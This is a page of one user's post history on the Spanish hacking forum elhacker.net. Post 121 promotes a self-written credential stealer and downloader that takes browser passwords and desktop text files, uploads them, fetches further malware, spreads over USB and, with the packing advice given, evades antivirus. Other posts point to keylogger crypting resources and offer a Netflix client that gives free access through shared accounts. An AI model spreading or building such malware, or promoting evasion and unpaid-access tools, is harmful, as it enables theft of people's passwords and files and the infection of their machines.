elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 72
121  Seguridad Informática / Análisis y Diseño de Malware / [Source Code] autorun.inf.wim - Stealer&Downloader / No Requiere Privilegios / Propagacion USB en: 10 Septiembre 2021, 02:18 am
Hola, Hace un Tiempo desarrolle un Stealer que lo llame PixieV Básicamente robaba las contraseñas guardadas en el navegador y las subía a algún servidor.

Como Estaba Desactualizado, ya no trabaja con versiones recientes del navegador. Lo actualice.

De hecho lo hice solo para participar en el Abril Negro de este año, pero no hubo evento....  :-\



Bueno Este Stealer Funciona Con todos los Navegadores basados en Chromium + Todos los demás navegadores en su versión mas reciente, asi que esta vigente....

Ventajas :

 1) Se Instala al Inicio Windows.
 2) Recolecta las Password guardadas en el navegador, y también todos los archivos .Txt que tengas en el escritorio y Documentos, los Comprime en un .zip y los sube al servidor.
 3) Descarga e Instala otros virus, El verifica en el servidor y descargará e instalara cualquier Software o script que le diga.
 4) NO REQUIERE Privilegios de administrador.
 5) Se Propaga por USB.
 6) No requiere de Dlls externas, Cargo las DLL desde los recursos, asi que basicamente Compilas el proyecto y solo usas el .exe, Olvidate de las dos DLL Externas.


Link :  autorun.inf.wim



Solo requiere un servidor, Yo uso este : https://000webhost.com/ es facil de usar, trae muchas cosas y sobre todo es gratuito.

Subes los PHP que deje en el repositorio, compilas el proyecto solo editando las urls del server y si quieres tambien el nombre del ensamblado.

Un buen Packer y/o Ofuscador. Yo por ejemplo le Pase Enigma + SFX de winrar y ni siquiera el 360 me lo detecto.

Eso fue todo, No Olviden comentar cualquier duda o pregunta que tengan.


122  Foros Generales / Foro Libre / Re: Qué canción estás escuchando ahora ? en: 6 Septiembre 2021, 23:07 pm
no se ya no puede estar contento o no esta muerto pero se que me queria, mequeria un monton, no se si puedes decir lomismo tu del tuyo

Corregido para evitar sangrado de Ojos :

No se, ya no puede estar contento, [o no esta muerto]?? pero se que me quería, me quería un montón, no se si puedes decir lo mismo tu del tuyo.



Mi canal de YouTube favorito para escuchar música :
Epic Music World

Mi Emisora de radio favorita : Rock Ultra

Lo estoy escuchando :







123  Seguridad Informática / Análisis y Diseño de Malware / Re: Ayuda al cifrar mi keylogger en: 6 Septiembre 2021, 22:47 pm
hace tiempo que no juego Samp, si revisas mi repo en github encontraras cosas buenas.

Bueno para empezar , este no es el mejor lugar para preguntar. El mejor lugar para preguntar sobre esto es :

Ugbase

Blast Hack

Segundo, Podrías convertir tu Cleo a ASI : C-CRYPTOR2 | Invincible CLEO Cryptor II | .CS to .ASI Converter


124  Comunicaciones / Android / Re: PLAY STORE DE CEL NO PUEDE DESINSTALAR NI ACTUALIZAR NINGUNA APP en: 6 Septiembre 2021, 22:15 pm
Como un alternativa :

Si necesitas desinstalar una app, puedes hacerlo desde configuraciones, y para instalar / actualizar cualquier aplicación puedes hacerlo desde otros clientes muy buenos, alternativas a la playStore:

APK Pure

MyApp Tencent

HappyMod (Aplicaciones Pagas/Originales Modificadas)

TapTap (Videjuegos)

Recuerda descargar dichas apps desde su pagina oficial y permitir orígenes desconocidos para poder instalar.


125  Informática / Software / Re: Netflix Lite - Un cliente de Netflix Ligero y portable de menos de 2mb en: 5 Septiembre 2021, 19:06 pm
Parece genial pero te saltas patentes y eso acarrea problemas legales (prisión y billetes).


Queremos tu bien desde el foro, ¿OK?

Vale entiendo, pero es tan serio? , a lo mucho que haria netflix seria banear la cuenta (creo), en toda la internet se encuentran distintos clientes de paginas, y ellos solo le ponen por ejemplo : "Unofficial Client" o esas cosas por el estilo, mayormente son Opensource.

Solo programo por hobbit y desconozco todo lo legal en este campo.
126  Informática / Software / Re: Netflix Lite - Un cliente de Netflix Ligero y portable de menos de 2mb en: 5 Septiembre 2021, 16:26 pm
¿Habilitas usar Netflix sin pagar?  :o

Yeah, basicamente.

Además de lo dicho en mí anterior mensaje, también hay que tener en cuenta que si esa aplicación utiliza algún método o técnica que pueda atentar contra las políticas de privacidad, términos y condiciones de Netflix.

De hecho no creo que viole las políticas de Netflix , ya que me baso en esto : https://www.softzone.es/2018/01/07/personas-ver-netflix-cuenta/ , mi programa usa cuentas globales que yo mismo cree, y que ustedes puedan acceder a ellas y usar Netflix, como normalmente seria.

Aunque si creo que le cambiare el nombre a Liteflix.



Una pregunta , siguieron los pasos que puse y lograron acceder a netflix usando la cuenta global? , es que esa parte todavía esta medio bug, pero funciona.


127  Informática / Software / Netflix Lite - Un cliente de Netflix Ligero y portable de menos de 2mb en: 5 Septiembre 2021, 01:38 am



Bueno para empezar, ya habia dicho que haria un cliente para Netflix desde DragonTube y bueno lo hice.

Primeramente estaba usando EO.WebBrowser, un motor basado en Chromium.

Pero cuando lo habia terminado, y procedo a las pruebas, no podia reproducir nada en Netflix  :-(, el problema es el plugin Widevine, Al final aunque logre agregarlo, no funciono.....  :-\

Clone el proyecto, removi EO.WebBrowser, y me puse a manos a la obra con el Control WebBrowser de .Net Framework , basado en IE. Sorpresivamente Funcionio genial, solo tenia que instalar Silverlight.

Estos cambios basicamente redujeron el peso de la aplicacion. y Posiblemente tengan que actualizar su version de Internet Explorer en windows vista y talvez en Windows 7 tambien.





Descarga : Netflix Lite (2mb)

Requsitos :






No Posees Netflix? no pasa nada, sigan los pasos a continuación :

- Después de Instalar Silverlight y que la aplicación les abra correctamente.

1) Abrimos la aplicacion, les aparecera el Login tipico de Netflix (Correo y contraseña)

2) Presionamos F2 y les aparecerá un nuevo recuadro, ahí pondrán un código, el código es : SoyPobreXD

3) Presionamos OK y cargara una barra de progreso verde. No cambien de aplicacion o toquen alguna tecla de su teclado, hasta que termine de cargar, Si se queda trabada o da algun error, es por problemas de cache, en este caso solo cierren y abran la aplicación de nuevo y repitan el proceso.

4) Ya deberían esta adentro de Netflix. Disfrute!!  ;-)

Nota : Si el Paso 3 no le funciono o le salio algun error, entonces cuando cierre y abra la app de nuevo debería salirle otro mensaje al iniciar, preguntándole si quiere usar la Cuenta Global (Se guardo un Punto de re continuacion) , asi que no debe volver a meter el codigo , solo presiono que Si, y deberia volver a ver la barra de progreso verde.

Intente esto varias veces hasta que entre a Netflix, si tiene suerte entrara a la primera.




Preview :









No se olviden de comentar su Opinion!!

128  Programación / Desarrollo Web / Re: [Pregunta]: ¿Como escribir en un input con javascript? en: 4 Septiembre 2021, 21:36 pm
Hola, gracias por las respuestas.

Al final así lo resolví:

Activamos el Foco en el Input :

Código
  1. document.getElementById('id_userLoginId').focus();

Convierto el String, en este caso el correo : Example@gmail.com en un array Char lo recorro y lo envio como pulsacion de tecla usando el motor Web, en este caso uno basado en Chromium (EO.WebBrowser) .

Código
  1.  Dim TextArray() As Char = UserString.ToCharArray
  2.  
  3.            For Each element As Char In TextArray
  4.                 WebView1.SendChar(element)
  5.            Next

Hago lo mismo con el campo Password. y posterior mente hago click el el boton de login. y listo, Funciona!. Asi me logeo en Netflix.



129  Programación / .NET (C#, VB.NET, ASP) / Re: Se puede dar Privilegios de Administrador a un segmento de código en especifico? en: 4 Septiembre 2021, 21:23 pm
Hola, gracias por responder.

La idea era hacerlo directamente en un solo ejecutable. y al final lo logre de la misma manera que lo hace ProcessHacker2.

Básicamente se ejecuta a si mismo mediante runas y con líneas de comandos sabe que función ejecutar.
130  Programación / Desarrollo Web / Re: [Pregunta]: ¿Como escribir en un input con javascript? en: 29 Agosto 2021, 21:10 pm
vale, entonces no puedo hacerlo ?

otra pregunta, sabes como funcionan los navegadores para llenar el campo user/password guardados en el navegador? , osea google chrome me auto completa el user en netflix perfectamente, pero no se como trabaja....  :-\

de todos modos, gracias.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ... 72
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines